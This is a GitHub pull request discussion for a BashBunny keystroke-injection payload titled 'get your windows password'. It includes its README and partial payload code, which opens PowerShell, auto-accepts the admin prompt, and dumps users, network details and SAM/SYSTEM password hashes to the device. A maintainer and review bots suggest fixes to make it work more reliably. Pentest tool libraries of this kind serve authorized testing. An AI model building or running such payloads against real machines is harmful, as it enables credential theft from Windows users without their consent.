get your windows password #701
I created a payload that gets the windows password hash
created a README
Placing this PR on hold as I am currently away from my hardware and am unable to test. I will follow up with a review soon :)
| Then it says yes to run as admin. | ||
| Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant)) | ||
| Then it writes down the IPs. (so you know what to connect to) | ||
| Then it writes down the hashes with SAM and SYSTEM. |
This payload seems more fitting inside of the exfiltration category due to its nature. Please move it into that category directory.
| QUACK DELAY 2200 | ||
| QUACK ALT Y | ||
| QUACK DELAY 1000 | ||
| QUACK STRING "ipconfig /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\IP.txt'" |
Not everyone's BashBunny will mount as D:/ drive. A better approach to this is to use the BashBunny drive label.
DRIVE_LABEL="BashBunny"
QUACK STRING '$Drive = (Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq "'$DRIVE_LABEL'" }).DriveLetter + "\"; $Drive'
This will have PowerShell use the BashBunny label to locate the drive letter of the BashBunny and export it as a PowerShell variable you can then later use for saving files to the BashBunny.
Just as an example:
QUACK STRING 'whoami /all | Out-File -FilePath "$($DRIVE)\loot\waitwhoamI.txt"'
Please make this change across your payload and be mindful of syntax overlaps.
| Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant)) | ||
| Then it writes down the IPs. (so you know what to connect to) | ||
| Then it writes down the hashes with SAM and SYSTEM. | ||
| DISCLAIMER: this is all wroten down on D:\nothingwashereorwillhappen\ so you need to have a folder with that name on your bash bunny. |
Please add a note instructing the end user to make a directory on the BashBunny root directory named nothingwashereorwillhappen as this is critical to the payload running. I would recommend renaming this directory to just be loot to simplify things as I did in my code example.
Thx, I didn't know to do it at that moment. I will look into it at a later date. Thank you now and thank you in advance.
On 25 Nov 2025 at 23:33, Peaks ***@***.***> wrote:
@hak5peaks requested changes on this pull request.
In payloads/library/phishing/getWINDOWSpassword/README.md:
@@ -0,0 +1,18 @@
+AUTHOR: AlexanderWyt
+SIDE NOTE: this is just a prototype and I will make a better one later
+
+HOW IT WORKS:
+It goes into a keyboard and storage.
+Then it turns red.
+Then it opens powershell via the run command.
+Then it closes powershell and makes it run as admin.
+Then it says yes to run as admin.
+Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant))
+Then it writes down the IPs. (so you know what to connect to)
+Then it writes down the hashes with SAM and SYSTEM.
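Review bot: The HOW IT WORKS steps "Then it closes powershell and makes it run as admin" and "Then it says yes to run as admin" leave their precondition unstated: they only apply when the logged-in user is a local administrator who is shown a yes/no consent prompt. Add a requirements line above HOW IT WORKS that says so, and name the file each "writes down" step produces, so a reader knows what ends up in the output folder without reading payload.txt.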
This payload seems more fitting inside of the exfiltration category due to its nature. Please move it into that category directory.
In payloads/library/phishing/getWINDOWSpassword/payload.txt:
@@ -0,0 +1,28 @@
+ATTACKMODE HID STORAGE
+LED R
+QUACK GUI r
+QUACK STRING powershell
+QUACK ENTER
+QUACK DELAY 1000
+QUACK STRING "exit Start-Process powershell -Verb RunAs"
+QUACK ENTER
+QUACK DELAY 2200
+QUACK ALT Y
+QUACK DELAY 1000
+QUACK STRING "ipconfig /all | Out-File -FilePath 'D:\nothingwashereorwillhappen\IP.txt'"
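Review bot: payload.txt starts at line 1 with `ATTACKMODE HID STORAGE` and has no comment header, so the title, author, target OS and attack modes can only be found in the README; add a leading `#` comment block with those fields. Separately, `QUACK ALT Y` follows a fixed `QUACK DELAY 2200`, so it and the later `QUACK STRING` lines are typed into whichever window has focus if the elevation prompt is late or absent; state that limitation in the README.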
Not everyone's BashBunny will mount as D:/ drive. A better approach to this is to use the BashBunny drive label.
DRIVE_LABEL="BashBunny"
QUACK STRING '$Drive = (Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq "'$DRIVE_LABEL'" }).DriveLetter + "\"; $Drive'
This will have PowerShell use the BashBunny label to locate the drive letter of the BashBunny and export it as a PowerShell variable you can then later use for saving files to the BashBunny.
Just as an example:
QUACK STRING 'whoami /all | Out-File -FilePath "$($DRIVE)\loot\waitwhoamI.txt"'
Please make this change across your payload and be mindful of syntax overlaps.
In payloads/library/phishing/getWINDOWSpassword/README.md:
@@ -0,0 +1,18 @@
+AUTHOR: AlexanderWyt
+SIDE NOTE: this is just a prototype and I will make a better one later
+
+HOW IT WORKS:
+It goes into a keyboard and storage.
+Then it turns red.
+Then it opens powershell via the run command.
+Then it closes powershell and makes it run as admin.
+Then it says yes to run as admin.
+Then it writes down the users. (just in case you dont know what the username is (Ik its irelevant))
+Then it writes down the IPs. (so you know what to connect to)
+Then it writes down the hashes with SAM and SYSTEM.
+DISCLAIMER: this is all wroten down on D:\nothingwashereorwillhappen\ so you need to have a folder with that name on your bash bunny.
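Review bot: The DISCLAIMER line at the end of the README hard-codes `D:\nothingwashereorwillhappen\`, which makes the documentation wrong on any machine that assigns the device a different drive letter; describe the folder relative to the device's storage root instead. It is also a setup requirement rather than a disclaimer, so it belongs above HOW IT WORKS, and "wroten" should be "written".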
Please add a note instructing the end user to make a directory on the BashBunny root directory named nothingwashereorwillhappen as this is critical to the payload running. I would recommend renaming this directory to just be loot to simplify things as I did in my code example.
Hi, I made this so you can get a computer's password. This only works on Windows.
And I just want to say have a great day.